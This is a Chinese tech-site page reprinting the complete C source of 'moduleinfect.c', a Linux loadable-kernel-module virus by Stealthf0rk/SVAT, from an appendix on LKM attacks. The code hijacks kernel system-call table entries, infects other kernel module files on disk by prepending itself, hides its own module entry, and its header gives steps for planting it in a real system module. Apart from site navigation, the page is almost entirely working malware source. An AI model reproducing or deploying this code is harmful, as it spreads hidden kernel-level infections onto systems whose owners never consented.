china.com
主页
新闻
体育
游戏
文化
教育
健康
财经
科技
旅游
军事
娱乐
商贸
  科技动态 硬件广场 下载基地 网络教室 网络冲浪 科学博览 移动时代 手机上网 桌面壁纸 科技商情  


附录(源码)


LKM Infector

名字 : moduleinfect.c

作者 : Stealthf0rk/SVAT

描述 : 这是第一个发布的LKM传染者,我们在2.8讨论过了。这个LKM没有破坏的代码,他仅仅是一个传染者。因此实验是没有危险的。

链接 : http://www.rootshell.com

/* SVAT - Special Virii And Trojans - present:

*

* -=-=-=-=-=-=- the k0dy-projekt, virii phor unix systems -=-=-=-=-=-=-=-

*

* 0kay guys, here we go...

* As i told you with VLP I (we try to write an fast-infector)

* here's the result:

* a full, non-overwriting module infector that catches

* lkm's due to create_module() and infects them (max. 7)

* if someone calls delete_module() [even on autoclean].

* Linux is not longer a virii-secure system :(

* and BSD follows next week ...

* Since it is not needed 2 get root (by the module) you should pay

* attention on liane.

* Note the asm code in function init_module().

* U should assemble your /usr/src/.../module.c with -S and your CFLAG

* from your Makefile and look for the returnvalue from the first call

* of find_module() in sys_init_module(). look where its stored (%ebp for me)

* and change it in __asm__ init_module()! (but may it is not needed)

*

* For education only!

* Run it only with permisson of the owner of the system you are logged on!!!

*

* !!! YOU USE THIS AT YOUR OWN RISK !!!

*

* I'm not responsible for any damage you may get due to playing around with this.

*

* okay guys, you have to find out some steps without my help:

*

* 1. $ cc -c -O2 module.c

* 2. get length of module.o and patch the #define MODLEN in module.c

* 3. $ ???

* 4. $ cat /lib/modules/2.0.33/fs/fat.o >> module.o

* 5. $ mv module.o /lib/modules/2.0.33/fs/fat.o

* >AND NOW, IF YOU REALLY WANT TO START THE VIRUS:<

* 6. $ insmod ???

*

* This lkm-virus was tested on a RedHat 4.0 system with 80486-CPU and

* kernel 2.0.33. It works.

*

* greets (in no order...)

* <><><><><><><><><><><><>

*

* NetW0rker - tkx for da sources

* Serialkiller - gib mir mal deine eMail-addy

* hyperSlash - 1st SVAT member, he ?

* naleZ - hehehe

* MadMan - NetW0rker wanted me to greet u !?

* KilJaeden - TurboDebugger and SoftIce are a good choice !

*

* and all de otherz

*

* Stealthf0rk/SVAT <stealth@cyberspace.org>

*/



#define __KERNEL__

#define MODULE

#define MODLEN 7104

#define ENOUGH 7

#define BEGIN_KMEM {unsigned long old_fs=get_fs();set_fs(get_ds());

#define END_KMEM set_fs(old_fs);}





/* i'm not sure we need all of 'em ...*/



#include <linux/version.h>

#include <linux/mm.h>

#include <linux/unistd.h>

#include <linux/fs.h>

#include <linux/types.h>

#include <asm/errno.h>

#include <asm/string.h>

#include <linux/fcntl.h>

#include <sys/syscall.h>

#include <linux/module.h>

#include <linux/malloc.h>

#include <linux/kernel.h>

#include <linux/kerneld.h>



#define __NR_our_syscall 211

#define MAXPATH 30

/*#define DEBUG*/

#ifdef DEBUG

#define DPRINTK(format, args...) printk(KERN_INFO format,##args)

#else

#define DPRINTK(format, args...)

#endif



/* where the sys_calls are */



extern void *sys_call_table[];



/* tested only with kernel 2.0.33, but thiz should run under 2.x.x

* if you change the default_path[] values

*/



static char *default_path[] = {

".", "/linux/modules",

"/lib/modules/2.0.33/fs",

"/lib/modules/2.0.33/net",

"/lib/modules/2.0.33/scsi",

"/lib/modules/2.0.33/block",

"/lib/modules/2.0.33/cdrom",

"/lib/modules/2.0.33/ipv4",

"/lib/modules/2.0.33/misc",

"/lib/modules/default/fs",

"/lib/modules/default/net",

"/lib/modules/default/scsi",

"/lib/modules/default/block",

"/lib/modules/default/cdrom",

"/lib/modules/default/ipv4",

"/lib/modules/default/misc",

"/lib/modules/fs",

"/lib/modules/net",

"/lib/modules/scsi",

"/lib/modules/block",

"/lib/modules/cdrom",

"/lib/modules/ipv4",

"/lib/modules/misc",

0

};



static struct symbol_table my_symtab = {

#include <linux/symtab_begin.h>

X(printk),

    X(vmalloc),

    X(vfree),

    X(kerneld_send),

    X(current_set),

    X(sys_call_table),

    X(register_symtab_from),

    #include <linux/symtab_end.h>

};



char files2infect[7][60 + 2];



/* const char kernel_version[] = UTS_RELEASE; */



int (*old_create_module)(char*, int);

int (*old_delete_module)(char *);

int (*open)(char *, int, int);

int (*close)(int);

int (*unlink)(char*);



int our_syscall(int);

int infectfile(char *);

int is_infected(char *);

int cp(struct file*, struct file*);

int writeVir(char *, char *);

int init_module2(struct module*);

char *get_mod_name(char*);



/* needed to be global */



void *VirCode = NULL;



/* install new syscall to see if we are already in kmem */

int our_syscall(int mn)

{

/* magic number: 40hex :-) */

if (mn == 0x40)

     return 0;

    else

     return -ENOSYS;

}



int new_create_module(char *name, int size)

{

int i = 0, j = 0, retval = 0;

    

    if ((retval = old_create_module(name, size)) < 0)

     return retval;

    /* find next free place */

    for (i = 0; files2infect[i][0] && i < 7; i++);

    if (i == 6)

     return retval;

    /* get name of mod from user-space */

    while ((files2infect[i][j] = get_fs_byte(name + j)) != 0 && j < 60)

     j++;

DPRINTK("in new_create_module: got %s as #%d\n", files2infect[i], i);

    return retval;

}



/* we infect modules after sys_delete_module, to be sure

* we don't confuse the kernel

*/



int new_delete_module(char *modname)

{

static int infected = 0;

int retval = 0, i = 0;

    char *s = NULL, *name = NULL;

    

    

    retval = old_delete_module(modname);



    if ((name = (char*)vmalloc(MAXPATH + 60 + 2)) == NULL)

     return retval;



for (i = 0; files2infect[i][0] && i < 7; i++) {

     strcat(files2infect[i], ".o");

        if ((s = get_mod_name(files2infect[i])) == NULL) {

         return retval;

        }

        name = strcpy(name, s);

        if (!is_infected(name)) {

         DPRINTK("try 2 infect %s as #%d\n", name, i);

            infected++;

            infectfile(name);

        }

        memset(files2infect[i], 0, 60 + 2);

    } /* for */

    /* its enough */

    if (infected >= ENOUGH)

     cleanup_module();

    vfree(name);

    return retval;

}





/* lets take a look at sys_init_module(), that calls

* our init_module() compiled with

* CFLAG = ... -O2 -fomit-frame-pointer

* in C:

* ...

* if((mp = find_module(name)) == NULL)

* ...

*

* is in asm:

* ...

* call find_module

* movl %eax, %ebp

* ...

* note that there is no normal stack frame !!!

* thats the reason, why we find 'mp' (return from find_module) in %ebp

* BUT only when compiled with the fomit-frame-pointer option !!!

* with a stackframe (pushl %ebp; movl %esp, %ebp; subl $124, %esp)

* you should find mp at -4(%ebp) .

* thiz is very bad hijacking of local vars and an own topic.

* I hope you do not get an seg. fault.

*/



__asm__

("



.align 16

.globl init_module

.type init_module,@function



init_module:

    pushl %ebp /* ebp is a pointer to mp from sys_init_module() */

             /* and the parameter for init_module2() */

    call init_module2  

    popl %eax

    xorl %eax, %eax /* all good */

    ret          /* and return */

.hype27:

.size init_module,.hype27-init_module

");

    

/* for the one with no -fomit-frame-pointer and no -O2 this should (!) work:

*

* pushl %ebx

* movl %ebp, %ebx

* pushl -4(%ebx)

* call init_module2

* addl $4, %esp

* xorl %eax, %eax

* popl %ebx

* ret

*/



/*----------------------------------------------*/



int init_module2(struct module *mp)

{  

    char *s = NULL, *mod = NULL, *modname = NULL;

    long state = 0;



   mod = vmalloc(60 + 2);

modname = vmalloc(MAXPATH + 60 + 2);

    if (!mod || !modname)

     return -1;    

    strcpy(mod, mp->name);

    strcat(mod, ".o");





    MOD_INC_USE_COUNT;    

    DPRINTK("in init_module2: mod = %s\n", mod);

    

    /* take also a look at phrack#52 ...*/

    mp->name = "";

    mp->ref = 0;

    mp->size = 0;



    /* thiz is our new main ,look for copys in kmem ! */

    if (sys_call_table[__NR_our_syscall] == 0) {  

old_delete_module = sys_call_table[__NR_delete_module];

        old_create_module = sys_call_table[__NR_create_module];

        sys_call_table[__NR_our_syscall] = (void*)our_syscall;

        sys_call_table[__NR_delete_module] = (void*)new_delete_module;    

        sys_call_table[__NR_create_module] = (void*)new_create_module;

        memset(files2infect, 0, (60 + 2)*7);

        register_symtab(&my_symtab);

    }

    open = sys_call_table[__NR_open];

    close = sys_call_table[__NR_close];    

    unlink = sys_call_table[__NR_unlink];    

    

    if ((s = get_mod_name(mod)) == NULL)

     return -1;

    modname = strcpy(modname, s);

load_real_mod(modname, mod);

vfree(mod);

    vfree(modname);

return 0;

}    



int cleanup_module()

{

sys_call_table[__NR_delete_module] = old_delete_module;

    sys_call_table[__NR_create_module] = old_create_module;

    sys_call_table[__NR_our_syscall] = NULL;

    DPRINTK("in cleanup_module\n");

    vfree(VirCode);

    return 0;

}



/* returns 1 if infected;

* seek at position MODLEN + 1 and read out 3 bytes,

* if it is "ELF" it seems the file is already infected

*/



int is_infected(char *filename)

{

char det[4] = {0};

    int fd = 0;

    struct file *file;



    DPRINTK("in is_infected: filename = %s\n", filename);

BEGIN_KMEM

    fd = open(filename, O_RDONLY, 0);

    END_KMEM

    if (fd <= 0)

     return -1;

    if ((file = current->files->fd[fd]) == NULL)

     return -2;

    file->f_pos = MODLEN + 1;

    DPRINTK("in is_infected: file->f_pos = %d\n", file->f_pos);

    BEGIN_KMEM

    file->f_op->read(file->f_inode, file, det, 3);

    close(fd);

    END_KMEM

    DPRINTK("in is_infected: det = %s\n", det);

    if (strcmp(det, "ELF") == 0)

     return 1;

    else

     return 0;

}



/* copy the host-module to tmp, write VirCode to

* hostmodule, and append tmp.

* then delete tmp.

*/





int infectfile(char *filename)

{

    char *tmp = "/tmp/t000";

    int in = 0, out = 0;

    struct file *file1, *file2;

    

    BEGIN_KMEM

    in = open(filename, O_RDONLY, 0640);

    out = open(tmp, O_RDWR|O_TRUNC|O_CREAT, 0640);

    END_KMEM

    DPRINTK("in infectfile: in = %d out = %d\n", in, out);

    if (in <= 0 || out <= 0)

     return -1;

    file1 = current->files->fd[in];

    file2 = current->files->fd[out];

    if (!file1 || !file2)

     return -1;

    /* save hostcode */

    cp(file1, file2);

    BEGIN_KMEM

    file1->f_pos = 0;

    file2->f_pos = 0;

    /* write Vircode [from mem] */

    DPRINTK("in infetcfile: filenanme = %s\n", filename);

    file1->f_op->write(file1->f_inode, file1, VirCode, MODLEN);

    /* append hostcode */

    cp(file2, file1);

    close(in);

    close(out);

    unlink(tmp);

    END_KMEM

return 0;

}    



int disinfect(char *filename)

{



char *tmp = "/tmp/t000";

    int in = 0, out = 0;

    struct file *file1, *file2;

    

    BEGIN_KMEM

    in = open(filename, O_RDONLY, 0640);

    out = open(tmp, O_RDWR|O_TRUNC|O_CREAT, 0640);

    END_KMEM

    DPRINTK("in disinfect: in = %d out = %d\n",in, out);

    if (in <= 0 || out <= 0)

     return -1;

    file1 = current->files->fd[in];

    file2 = current->files->fd[out];

    if (!file1 || !file2)

     return -1;

    /* save hostcode */

    cp(file1, file2);

BEGIN_KMEM

close(in);

    DPRINTK("in disinfect: filename = %s\n", filename);

    unlink(filename);

in = open(filename, O_RDWR|O_CREAT, 0640);

END_KMEM

if (in <= 0)

return -1;

file1 = current->files->fd[in];

if (!file1)

     return -1;

    file2->f_pos = MODLEN;

cp(file2, file1);

BEGIN_KMEM

close(in);

close(out);

unlink(tmp);

END_KMEM

return 0;

}



/* a simple copy routine, that expects the file struct pointer

* of the files to be copied.

* So its possible to append files due to copieng.

*/



int cp(struct file *file1, struct file *file2)

{



int in = 0, out = 0, r = 0;

    char *buf;

    

    if ((buf = (char*)vmalloc(10000)) == NULL)

     return -1;



    DPRINTK("in cp: f_pos = %d\n", file1->f_pos);

    BEGIN_KMEM

    while ((r = file1->f_op->read(file1->f_inode, file1, buf, 10000)) > 0)

     file2->f_op->write(file2->f_inode, file2, buf, r);

    file2->f_inode->i_mode = file1->f_inode->i_mode;

    file2->f_inode->i_atime = file1->f_inode->i_atime;

    file2->f_inode->i_mtime = file1->f_inode->i_mtime;

    file2->f_inode->i_ctime = file1->f_inode->i_ctime;

    END_KMEM

    vfree(buf);

    return 0;

}



/* Is that simple: we disinfect the module [hide 'n seek]

* and send a request to kerneld to load

* the orig mod. N0 fuckin' parsing for symbols and headers

* is needed - cool.

*/

int load_real_mod(char *path_name, char *name)

{

    int r = 0, i = 0;

    struct file *file1, *file2;

    int in = 0, out = 0;



    DPRINTK("in load_real_mod name = %s\n", path_name);

    if (VirCode)

     vfree(VirCode);

    VirCode = vmalloc(MODLEN);

    if (!VirCode)

        return -1;

    BEGIN_KMEM

    in = open(path_name, O_RDONLY, 0640);

    END_KMEM

if (in <= 0)

     return -1;

    file1 = current->files->fd[in];

    if (!file1)

       return -1;

    /* read Vircode [into mem] */

BEGIN_KMEM

    file1->f_op->read(file1->f_inode, file1, VirCode, MODLEN);

close(in);

END_KMEM

disinfect(path_name);

    r = request_module(name);

    DPRINTK("in load_real_mod: request_module = %d\n", r);

    return 0;

}

    

char *get_mod_name(char *mod)

{

int fd = 0, i = 0;

static char* modname = NULL;



if (!modname)

modname = vmalloc(MAXPATH + 60 + 2);

if (!modname)

return NULL;

BEGIN_KMEM

    for (i = 0; (default_path[i] && (strstr(mod, "/") == NULL)); i++) {

memset(modname, 0, MAXPATH + 60 + 2);

modname = strcpy(modname, default_path[i]);

modname = strcat(modname, "/");

        modname = strcat(modname, mod);

if ((fd = open(modname, O_RDONLY, 0640)) > 0)

break;

    }

    close(fd);

    END_KMEM  

    if (!default_path[i])

     return NULL;

return modname;

}

 

  摘自《赛迪网》 pragmatic/THC,(版本1.0)/文

 


科技检索


中华网推荐

  • 1000名医生在线咨询

  • 中国足球队官方网站

  • 鸦片玫瑰(新版)

  • 精选股票天地

  • 闪光的flash教程

  • 中华网汽车世界

  • 为你的爱情出谋划策

  • 网文精选——野百合集

  • 世界文化遗产在中国

  • 历届香港小姐风姿集




  • 网络教室编辑信箱
    版权声明 | 本站检索 | 联系方法 | 刊登广告 | 使用说明 | 关于中华网 | 豁免条款

    版权所有 中华网